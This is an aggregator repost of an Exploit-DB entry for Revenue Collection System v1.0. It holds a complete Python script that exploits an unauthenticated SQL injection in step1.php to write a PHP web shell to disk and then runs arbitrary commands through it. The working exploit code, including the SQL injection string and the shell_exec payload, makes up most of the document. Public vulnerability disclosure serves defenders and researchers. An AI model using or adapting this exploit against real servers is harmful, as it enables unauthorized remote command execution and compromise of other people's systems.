3
[webapps] Revenue Collection System v1.0 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51133
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Revenue Collection System v1.0 - Remote Code Execution (RCE)
# Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE)
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
# Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to
# write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.
# This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.
# Ex: python3 rcsv1.py 10.10.14.2 "ls"
import sys, requests
def main():
if len(sys.argv) != 3:
print("(+) usage: %s <target> <cmd>" % sys.argv[0])
print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0])
sys.exit(-1)
targetIP = sys.argv[1]
cmd = sys.argv[2]
s = requests.Session()
# Define obscure filename and command parameter to limit exposure and usage of the RCE.
FILENAME = "youcantfindme.php"
CMDVAR = "ohno"
# Define the SQL injection string
sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)
# Write the PHP file to disk using the SQL injection vulnerability
url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)
r1 = s.get(url1)
# Execute the user defined command and display the result
url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)
r2 = s.get(url2)
print(r2.text)
if __name__ == '__main__':
main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK